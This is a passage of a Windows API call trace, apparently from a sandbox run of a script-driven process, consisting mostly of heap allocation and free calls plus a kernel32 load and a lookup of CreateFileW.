(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0081.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0081.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0081.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.452] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0081.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0081.452] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0081.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0081.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0081.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0081.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0081.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0081.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0081.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0081.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0081.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0081.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0081.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0081.461] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0081.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4a58 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.464] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.467] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb090 [0081.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb090, cbMultiByte=12, 